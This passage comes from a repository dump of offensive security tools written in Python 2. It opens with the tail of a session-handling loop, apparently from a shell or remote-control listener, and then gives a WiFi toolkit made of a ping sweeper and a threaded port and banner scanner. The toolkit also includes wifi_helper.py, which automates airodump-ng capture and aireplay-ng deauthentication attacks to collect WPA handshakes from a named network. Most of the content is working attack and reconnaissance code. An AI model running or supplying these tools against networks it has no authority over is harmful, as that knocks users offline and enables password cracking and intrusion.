                        session_flag = 1
                if session_flag == 0:
                    print "[-] No such session"
                if len(SOCK_LIST) == 0:
                    print "[-] No established session"
            except:
                print "[-] session SESSIONID, type 'sessions' to show the established sessions and the SESSIONID"
        elif command.startswith('killsession'):
            try:
                sessionid = command.split()[1]
                session_flag = 0
                for _ in SOCK_LIST:
                    if sessionid.lower() == _['sessionid'].lower():
                        kill_session(sessionid, _['conn'])
                        session_flag = 1
                if session_flag == 0:
                    print "[-] No such session"
            except Exception as e:
                print e
                print "[-] killsession SESSIONID, type 'sessions' to show the established sessions and the SESSIONID"
        else:
            print "[-] type 'help()' to show the help info"
```

--------------------------------------------------------------------------------
/wifi_security_helper/README.md:
--------------------------------------------------------------------------------
Some scripts for WiFi security

wifi_helper.py : a script for using Aircrack-ng easily

pinger.py : to find IPs in the (WiFi) intranet

port_banner_scan.py : to get open ports and their banners; if the service on the port is a web service, the script will also get the web title

--------------------------------------------------------------------------------
/wifi_security_helper/pinger.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
#
# to find IPs in (wifi)intranet
#
# Usage:
#   pinger.py IP [-A] [thread]
#   or
#   pinger.py IP [thread] [-A]
#
# default network_number=16 192.168.1.1/16
# use -A to set network_number=8 192.168.1.1/8

import re
import os
import sys
import time
import Queue
import threading
from subprocess import Popen, PIPE

mutex = threading.Lock()

def ping_scan(ip):
    # One ICMP echo per address; the reply is recognised from the ping tool's output text
    if os.name == "nt":
        try:
            p=Popen('ping -n 1 ' + ip, stdout=PIPE)
        except:
            sys.exit("[*] Can't ping")
        if p.stdout.read().find("TTL") != -1: return True
    else:
        try:
            p=Popen(['ping','-c 1',ip], stdout=PIPE, stderr=PIPE)
        except:
            sys.exit("[*] Can't ping")
        if p.stdout.read().find("1 received") != -1: return True
    return False

def start():
    while not q.empty():
        try:
            ip = q.get(True, 1)
            if ping_scan(ip):
                mutex.acquire()
                print "[+] %s is up"%(ip)
                mutex.release()
        except:
            pass
        finally:
            q.task_done()

if __name__ == "__main__":
    if len(sys.argv) < 2 or len(sys.argv) > 4:
        sys.exit("[*] Usage: %s IP [-A] [thread]"%(sys.argv[0]))
    try:
        t1 = time.time()
        thread_num = int(sys.argv[-1]) if sys.argv[-1].isdigit() else int(sys.argv[-2]) if sys.argv[-2].isdigit() else 200

        ip = sys.argv[1]
        if len(ip.split(".")) != 4: sys.exit("[*] Usage: %s IP [-A] [thread]"%(sys.argv[0]))
        for i in ip.split("."):
            if int(i) < 0 or int(i) > 255:
                sys.exit("[*] Usage: %s IP [-A] [thread]"%(sys.argv[0]))

        # Only the .1 and .254 addresses of each /24 are probed, as likely gateway addresses
        if sys.argv[-1] == "-A" or sys.argv[-2] == "-A":
            ip_start = ip.split(".")[0]
            ip_list1 = ["%s.%d.%d.1"%(ip_start, i, j) for i in range(256) for j in range(256)]
            ip_list2 = ["%s.%d.%d.254"%(ip_start, i, j) for i in range(256) for j in range(256)]
            ip_list = list(set(ip_list1+ip_list2))
            print "[*] scan %s.0.0.0/8 with %d threads"%(ip_start, thread_num)
        else:
            ip_start = ".".join([ip.split(".")[0], ip.split(".")[1]])
            ip_list1 = ["%s.%d.1"%(ip_start, i) for i in range(256)]
            ip_list2 = ["%s.%d.254"%(ip_start, i) for i in range(256)]
            ip_list = list(set(ip_list1+ip_list2))
            print "[*] scan %s.0.0/16 with %d threads"%(ip_start, thread_num)

        q = Queue.Queue()
        map(lambda x: q.put(x), ip_list)
        map(lambda x: x.start(), [threading.Thread(target=start) for i in range(thread_num)])
        q.join()
        sys.exit("[*] scan over in %ss"%(time.time() - t1))
    except Exception as e:
        sys.exit(e)
```

--------------------------------------------------------------------------------
/wifi_security_helper/port_banner_scan.py:
--------------------------------------------------------------------------------
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # to get a opened-port and the banner, if the service of the port is web, the script will get the web title 5 | # 6 | # Usage: 7 | # port_banner_scan.py IP/CIDR [ports] [-o outputfile] [-t theadnum] 8 | 9 | import re 10 | import sys 11 | import Queue 12 | import socket 13 | import chardet 14 | import requests 15 | import threading 16 | from netaddr import IPNetwork 17 | mutex = threading.Lock() 18 | requests.packages.urllib3.disable_warnings() 19 | 20 | PORTS = [21,22,23,25,53,67,68,80,81,82,83,84,85,86,87,88,89,90,109,110,139,143,161,389,443,445,465,512,513,514,808,843,873,880,888,993,995,1080,1090,1098,1099,1158,1352,1433,1434,1521,1723,1873,2082,2083,2181,2222,2375,2601,2604,3128,3306,3311,3312,3389,3690,4440,4444,4445,4848,5000,5432,5632,5800,5900,5984,6082,6379,7001,7002,7778,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8020,8030,8040,8050,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8099,8100,8161,8200,8291,8443,8480,8488,8588,8688,8788,8800,8888,8900,9000,9001,9002,9003,9004,9005,9006,9007,9008,9909,9010,9020,9030,9040,9050,9060,9070,9080,9090,9043,9200,9300,9060,9080,9090,9999,10000,10001,10990,11211,14147,27017,28017,50000,50030,50070,61616] 21 | result = [] 22 | 23 | def gettitle(ip, port): 24 | urls = ["http://%s:%d"%(ip, int(port)), "https://%s:%d"%(ip, int(port))] 25 | for url in urls: 26 | try: 27 | req = requests.get(url, timeout=2, verify=False) 28 | if req.status_code == 400: 29 | continue 30 | title_match = re.search(r'(.*?)', req.content, flags=re.I|re.M) 31 | if title_match: title=title_match.group(1) 32 | return title 33 | except: 34 | pass 35 | return "" 36 | 37 | def portscan(ip, port): 38 | service_info = "" 39 | title = "" 40 | try: 41 | socket.setdefaulttimeout(2.0) 42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | s.connect((ip, int(port))) 44 | 
except: 45 | return False, "" 46 | 47 | try: 48 | s.send('hello') 49 | r = s.recv(512) 50 | service_info = ''.join(r.splitlines()) 51 | if "http" in r.lower(): 52 | for i in r.splitlines(): 53 | if 'server' in i.lower(): 54 | service_info = i 55 | title = gettitle(ip, port) 56 | s.close() 57 | except: 58 | pass 59 | return service_info, title 60 | 61 | def start(): 62 | while not q.empty(): 63 | try: 64 | ip, port = q.get(block = True, timeout = 1).split(':') 65 | service_info, title = portscan(ip, port) 66 | if service_info != False: 67 | mutex.acquire() 68 | try: 69 | if chardet.detect(title)['encoding'] == 'utf-8': 70 | title = title.decode('utf-8') 71 | result.append("%-18s\t%-5s\t%-50s\t%-20s"%(ip, str(port), service_info, title)) 72 | print "%-18s\t%-5s\t%-50s\t%-20s"%(ip, str(port), service_info, title) 73 | mutex.release() 74 | except: 75 | print "\n" 76 | mutex.release() 77 | q.task_done() 78 | except Exception as e: 79 | pass 80 | 81 | if __name__ == "__main__": 82 | threads = 200 83 | output = "" 84 | allports = 0 85 | argvs = sys.argv[:] 86 | 87 | if '-t' in argvs: 88 | try: 89 | threads = int(argvs[argvs.index('-t')+1]) 90 | del argvs[argvs.index('-t')+1], argvs[argvs.index('-t')] 91 | except: 92 | sys.exit('[*] threads error') 93 | if '-o' in argvs: 94 | try: 95 | output = argvs[argvs.index('-o')+1] 96 | del argvs[argvs.index('-o')+1], argvs[argvs.index('-o')] 97 | except: 98 | sys.exit('[*] output file error') 99 | if '-all' in argvs: 100 | allports = 1 101 | argvs.remove('-all') 102 | 103 | if len(argvs) == 2: 104 | ports = PORTS 105 | elif len(argvs) == 3: 106 | try: 107 | ports = argvs[2].split(',') 108 | for port in ports: 109 | if int(port) < 1 or int(port) > 65535: 110 | sys.exit("[*] ports should be 1-65535") 111 | except: 112 | sys.exit('[*] ports should be a comma-separated list') 113 | else: 114 | sys.exit('Usage: %s IP/CIDR [ports] [-o outputfile] [-t theadnum]'%(argvs[0])) 115 | 116 | try: 117 | ips = IPNetwork(argvs[1]) 118 | except: 119 
| sys.exit("[*] IP format error") 120 | if allports == 1: 121 | map(lambda x: ports.append(x), range(1, 65536)) 122 | ip_list = [ip.format() for ip in ips] 123 | port_list = list(set(ports)) 124 | 125 | ip_port_list = [ip+":"+str(port) for ip in ip_list for port in port_list] 126 | 127 | result.append("%s\n%s\n%-18s\t%-5s\t%-50s\t%-20s\n%s"%(' '.join(sys.argv), '-'*100, "IP", "Port", "ServiceInfo", "WebTitle", '-'*100)) 128 | print "%s\n%s\n%-18s\t%-5s\t%-50s\t%-20s\n%s"%(' '.join(sys.argv), '-'*100, "IP", "Port", "ServiceInfo", "WebTitle", '-'*100) 129 | q = Queue.Queue() 130 | map(lambda x: q.put(x), ip_port_list) 131 | map(lambda x: x.start(), [threading.Thread(target=start) for i in range(threads)]) 132 | q.join() 133 | result.append("-"*100) 134 | print "-"*100 135 | 136 | if output != "": 137 | try: 138 | fp = open(output, "a+") 139 | map(lambda x: fp.writelines(x+'\n'), result) 140 | fp.close() 141 | except: 142 | pass -------------------------------------------------------------------------------- /wifi_security_helper/wifi_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # it's a script just for using Aircrack-ng easily 5 | # 6 | # Usage: 7 | # wifi_helper.py interface wifi-name 8 | 9 | import os 10 | import sys 11 | import time 12 | from multiprocessing import Process 13 | 14 | class WIFIGeter: 15 | def __init__(self, interface, name): 16 | self.interface = interface 17 | self.name = name 18 | self.essid = "" 19 | self.bssid = "" 20 | self.flag = 0 21 | 22 | self.stop() 23 | self.start() 24 | self.stop() 25 | 26 | def start(self): 27 | p = os.system('ifconfig %s down'%(self.interface)) 28 | p = os.system('iwconfig %s mode monitor'%(self.interface)) 29 | p = os.system('rm -rf tmp-wifi-%s*'%(self.name)) 30 | p = os.system('rm -rf result-wifi-%s*'%(self.name)) 31 | 32 | p1 = Process(target=self.get_all_wifis_bssid()) 33 | p1.start() 34 | p2 = 
Process(target=self.get_specified_wifi_bssid_by_name()) 35 | p2.start() 36 | p2.join() 37 | p3 = Process(target=self.get_specified_wifi_handshake()) 38 | p3.start() 39 | p4 = Process(target=self.send_repaly_package()) 40 | p4.start() 41 | p4.join() 42 | 43 | def get_all_wifis_bssid(self): 44 | p = os.system('airodump-ng %s -w tmp-wifi-%s --output-format csv &'%(self.interface, self.name)) 45 | 46 | def get_specified_wifi_bssid_by_name(self): 47 | csv_size = 0 48 | while True: 49 | try: 50 | fp = open('tmp-wifi-%s-01.csv'%(self.name), 'r+') 51 | for i in fp.readlines(): 52 | if self.name.lower() in i.lower(): 53 | print time.strftime('%H:%M:%S',time.localtime(time.time())) 54 | print i.split(',') 55 | self.essid = i.split(',')[-2].strip() 56 | self.bssid = i.split(',')[0].strip() 57 | self.channel = i.split(',')[3].strip() 58 | break 59 | fp.close() 60 | if len(self.essid) > 0: 61 | break 62 | time.sleep(5) 63 | if csv_size == os.path.getsize('tmp-wifi-%s-01.csv'%(self.name)): 64 | self.stop() 65 | self.start() 66 | else: 67 | csv_size = os.path.getsize('tmp-wifi-%s-01.csv'%(self.name)) 68 | except Exception as e: 69 | pass 70 | p = os.system(r"ps -aux | grep airodump-ng | grep tmp-wifi-%s | awk '{ print $2 }'| xargs kill -9"%(self.name)) 71 | p = os.system('rm -rf tmp-wifi-%s*'%(self.name)) 72 | 73 | def get_specified_wifi_handshake(self): 74 | p = os.system('airodump-ng -w result-wifi-%s -c %s --bssid %s %s --output-format cap &'%(self.name, self.channel, self.bssid, self.interface)) 75 | 76 | def send_repaly_package(self): 77 | cap_size = 0 78 | while True: 79 | os.system(r"ps -aux | grep aireplay-ng | awk '{ print $2 }'| xargs kill -9") 80 | time.sleep(5) 81 | p = os.system('aireplay-ng -0 10 -a %s %s &'%(self.bssid, self.interface)) 82 | self.check_handshake() 83 | if self.flag == 1: 84 | os.system(r"ps -aux | grep aireplay-ng | awk '{ print $2 }'| xargs kill -9") 85 | break 86 | time.sleep(5) 87 | try: 88 | if cap_size == 
os.path.getsize('result-wifi-%s-01.cap'%(self.name)): 89 | self.stop() 90 | self.start() 91 | else: 92 | cap_size = os.path.getsize('result-wifi-%s-01.cap'%(self.name)) 93 | except: 94 | pass 95 | 96 | 97 | def check_handshake(self): 98 | p = os.popen('aircrack-ng result-wifi-%s-01.cap'%(self.name)) 99 | if '1 handshake' in p.read(): 100 | self.flag = 1 101 | 102 | def stop(self): 103 | p = os.system(r"ps -aux | grep airodump-ng | grep tmp-wifi-%s | awk '{ print $2 }'| xargs kill -9"%(self.name)) 104 | p = os.system(r"ps -aux | grep airodump-ng | grep result-wifi-%s | awk '{ print $2 }'| xargs kill -9"%(self.name)) 105 | p = os.system(r"ps -aux | grep aireplay-ng | awk '{ print $2 }'| xargs kill -9") 106 | 107 | if len(sys.argv) != 3: 108 | sys.exit("Usage: %s interface wifi-name"%(sys.argv[0])) 109 | 110 | interface = sys.argv[1] 111 | name = sys.argv[2] 112 | 113 | try: 114 | target=WIFIGeter(interface, name) 115 | except KeyboardInterrupt: 116 | WIFIGeter(interface, name).stop() 117 | 118 | sys.exit() --------------------------------------------------------------------------------